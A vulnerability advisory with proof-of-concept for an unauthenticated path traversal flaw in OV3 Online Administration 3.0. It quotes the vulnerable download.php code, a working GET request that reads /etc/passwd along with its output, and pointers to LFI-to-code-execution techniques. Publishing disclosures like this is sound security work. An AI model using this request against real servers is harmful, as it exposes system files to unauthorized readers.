OV3 Online Administration 3.0 Parameter Traversal Arbitrary File Access PoC Exploit


Vendor: novaCapta Software & Consulting GmbH
Product web page: http://www.meacon.de
Affected version: 3.0

Summary: With the decision to use the OV3 as a platform for your data management,
the course is set for scalable, flexible and high-performance applications. Whether
you use the OV3 for your internal data management or use it for commercial business
applications such as shops, portals, etc. Thanks to the data-based structure of the
OV3, you always have the best tool at your fingertips. The OV3 is a 100% web-based
tool. This eliminates the need to install a new software on all participating client
computers. All elements are operated by a standard browser. Further advantages are
the location-dependent use and - particularly with ASP solutions - the reduced costs
for local hardware like own servers and modern client workstations.

Desc: The application (Online Verwaltung III) suffers from an unauthenticated file
disclosure vulnerability when input passed thru the 'file' parameter to 'download.php'
script is not properly verified before being used to include files. This can be exploited
to read arbitrary files from local resources with directory traversal attacks.

================================================================================
/download.php:
--------------

67: 	header("Expires: Mon, 1 Apr 1990 00:00:00 GMT");
68: 	header("Last-Modified: " . gmdate("D,d M YH:i:s") . " GMT");
69: 	/*
70: 	header("Cache-Control: no-cache, must-revalidate");
71: 	header("Pragma: no-cache");
72: 	*/
73: 	header("Pragma: "); 
74: 	header("Cache-Control: ");
75: 	header("Content-type: application/octet-stream");
76: 	header("Content-Type: application/force-download");
77: 	$dname = rawurlencode($name);
78: 	header("Content-Disposition: attachment; filename=\"$dname\";");
79:
80: 	if ($export==1) {
81:     	if (is_file($path.'/'.$file)) {
82:         	header('Content-Length: '.filesize($path.'/'.$file));
83:         	readfile($path.'/'.$file);
84:     	} elseif (is_file(utf8_decode($path.'/'.$file))) {
85:         	header('Content-Length: '.filesize(utf8_decode($path.'/'.$file)));
86:         	readfile(utf8_decode($path.'/'.$file));
87:     	}
88: 	}

================================================================================

Tested on: CentOS release 6.8 (Final)
           PHP/5.3.3
           Apache/2.2.15
           MySQL/5.0.11


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5410
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5410.php


26.12.2016

---


GET /download.php?c_id=557&file=../../../../../../../../../../../etc/passwd&name=download.txt HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: ZSL/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
DNT: 1
Connection: close

--

HTTP/1.1 200 OK
Date: Tue, 27 Dec 2016 12:24:10 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Expires: Mon, 1 Apr 1990 00:00:00 GMT
Last-Modified: Tue,27 Dec 201612:24:10 GMT
Pragma: 
Cache-Control: 
Content-Disposition: attachment; filename="download.txt";
Content-Length: 0
Connection: close
Content-Type: application/force-download

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
...
...



The application ships with a phpinfo() file "m_info.php" by default in the web root directory:

http://127.0.0.1/m_info.php

Possibly exploitable for code execution using the PHP LFI to RCE method by Gynvael Coldwind,
extended by Brett Moore:

 - http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf
 - https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf